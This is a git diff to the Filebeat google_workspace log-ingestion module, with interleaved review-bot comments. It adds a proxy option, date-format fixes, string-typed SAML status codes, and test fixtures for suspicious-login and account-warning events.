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" } diff --git a/x-pack/filebeat/module/google_workspace/groups/config/config.yml b/x-pack/filebeat/module/google_workspace/groups/config/config.yml index 6d713ebdb29..261f412a104 100644 --- a/x-pack/filebeat/module/google_workspace/groups/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/groups/config/config.yml @@ -11,11 +11,14 @@ request.url: https://www.googleapis.com/admin/reports/v1/activity/users/{{ .user {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +30,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log @@ -45,7 +48,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gworkspace-common 
diff --git a/x-pack/filebeat/module/google_workspace/groups/manifest.yml b/x-pack/filebeat/module/google_workspace/groups/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/google_workspace/groups/manifest.yml +++ b/x-pack/filebeat/module/google_workspace/groups/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/google_workspace/login/config/config.yml b/x-pack/filebeat/module/google_workspace/login/config/config.yml index 3ce48abe77b..137450f2ad4 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/login/config/config.yml @@ -11,11 +11,14 @@ request.url: https://www.googleapis.com/admin/reports/v1/activity/users/{{ .user {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +30,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log @@ -45,7 +48,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/login/config/pipeline.js b/x-pack/filebeat/module/google_workspace/login/config/pipeline.js index 9f9610393f1..a7b54afd43e 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/pipeline.js 
+++ b/x-pack/filebeat/module/google_workspace/login/config/pipeline.js @@ -64,7 +64,7 @@ var login = (function () { // this is a timestamp in microseconds case "timestamp": var millis = p.intValue / 1000; - evt.Put("event.start", new Date(millis).toUTCString()); + evt.Put("event.start", new Date(millis)); break; case "challenge_status": if (p.value === "Challenge Passed") { diff --git a/x-pack/filebeat/module/google_workspace/login/manifest.yml b/x-pack/filebeat/module/google_workspace/login/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/google_workspace/login/manifest.yml +++ b/x-pack/filebeat/module/google_workspace/login/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json index 48f7038df80..a4e0f480040 100644 --- a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json 
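Review bot: `evt.Put("event.start", new Date(millis));` stores a Date built from `p.intValue / 1000` without checking that the parameter actually carries a numeric `intValue`; when it does not, `millis` is `NaN` and the event gets an invalid Date where the old code at least produced a string. A guard such as `if (isFinite(millis)) { evt.Put("event.start", new Date(millis)); }` keeps a malformed login timestamp out of `event.start`; how the script processor serialises an invalid Date is not visible here, so the exact failure mode is an assumption. The enclosing `switch` begins and ends outside the hunk. The gsuite login pipeline.js hunk makes the identical change and has the same gap.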
@@ -55,6 +55,174 @@ "user.target.email": "foo@elastic.co", "user.target.name": "foo" }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "suspicious_login", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 406, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + 
"source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "suspicious_login_less_secure_app", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 853, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": 
-77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "suspicious_programmatic_login", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 1316, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + 
"source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "account_disabled_generic", 
@@ -223,6 +391,63 @@ "user.target.email": "foo@elastic.co", "user.target.name": "foo" }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "account_disabled_hijacked", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "user", + "change" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 2992, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + 
"source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "gov_attack_warning", diff --git a/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml b/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml index b7e9efc0926..fc0adfcb55c 100644 --- a/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml +++ b/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml @@ -18,10 +18,10 @@ description: > User orgunit. - name: status_code - type: long + type: keyword description: > SAML status code. - name: second_level_status_code - type: long + type: keyword description: > SAML second level status code. diff --git a/x-pack/filebeat/module/google_workspace/saml/config/config.yml b/x-pack/filebeat/module/google_workspace/saml/config/config.yml index da0641282fc..f8e64ef624b 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/saml/config/config.yml @@ -11,11 +11,14 @@ request.url: https://www.googleapis.com/admin/reports/v1/activity/users/{{ .user {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: 
@@ -27,7 +30,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log @@ -45,7 +48,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js b/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js index 9a779f8dd88..705db7f2f1e 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js @@ -32,14 +32,7 @@ var saml = (function () { // all saml event parameters are strings. // for this reason we know for sure they are in the 'value' field. // https://developers.google.com/admin-sdk/reports/v1/appendix/activity/saml - switch (p.name) { - case "status_code": - case "second_level_status_code": - evt.Put("google_workspace.saml."+p.name, parseInt(p.value)); - break; - default: - evt.Put("google_workspace.saml."+p.name, p.value); - } + evt.Put("google_workspace.saml."+p.name, p.value); }); evt.Delete("json.events.parameters"); diff --git a/x-pack/filebeat/module/google_workspace/saml/manifest.yml b/x-pack/filebeat/module/google_workspace/saml/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/google_workspace/saml/manifest.yml +++ b/x-pack/filebeat/module/google_workspace/saml/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log index 678193e25d5..ed672b58a56 100644 --- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log 
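Review bot: With the `parseInt` branch gone, `evt.Put("google_workspace.saml."+p.name, p.value);` in the `@@ -32,14 +32,7 @@` hunk stores `status_code` and `second_level_status_code` as strings, and nothing in the new code says why. A short comment above the call, e.g. `// status codes are kept as strings: the API reports values such as "SUCCESS_URI", not numbers`, would record that for the next reader (the value is taken from the updated test fixture). Indices written by earlier versions presumably still map these two fields as `long`, so saved searches or detection rules that compare them numerically may stop matching after the upgrade; a breaking-change note would help, if the changelog hunks outside this part of the diff do not already carry one. The enclosing function starts and ends outside the hunk.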
+++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log 
@@ -1,2 +1,2 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"400"},{"name":"saml_status_code","value":"400"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"400"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json index 90f6463ce34..d6f84e5c64f 100644 --- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json 
@@ -9,7 +9,7 @@ "event.dataset": "google_workspace.saml", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"400\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "failure", "event.provider": "saml", "event.type": [ 
@@ -24,8 +24,8 @@ "google_workspace.saml.failure_type": "failure_app_not_configured_for_user", "google_workspace.saml.initiated_by": "idp", "google_workspace.saml.orgunit_path": "ounit", - "google_workspace.saml.second_level_status_code": 400, - "google_workspace.saml.status_code": 400, + "google_workspace.saml.second_level_status_code": "SUCCESS_URI", + "google_workspace.saml.status_code": "SUCCESS_URI", "input.type": "log", "log.offset": 0, "organization.id": "1", @@ -68,7 +68,7 @@ "event.dataset": "google_workspace.saml", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "success", "event.provider": "saml", "event.type": [ 
@@ -82,9 +82,9 @@ "google_workspace.saml.application_name": "app", "google_workspace.saml.initiated_by": "idp", "google_workspace.saml.orgunit_path": "ounit", - "google_workspace.saml.status_code": 400, + "google_workspace.saml.status_code": "SUCCESS_URI", "input.type": "log", - "log.offset": 606, + "log.offset": 622, "organization.id": "1", "related.ip": [ "98.235.162.24" diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml index 2219d3ba1a0..33b6cf987a0 100644 --- a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml @@ -11,11 +11,14 @@ request.url: https://www.googleapis.com/admin/reports/v1/activity/users/{{ .user {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +30,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: 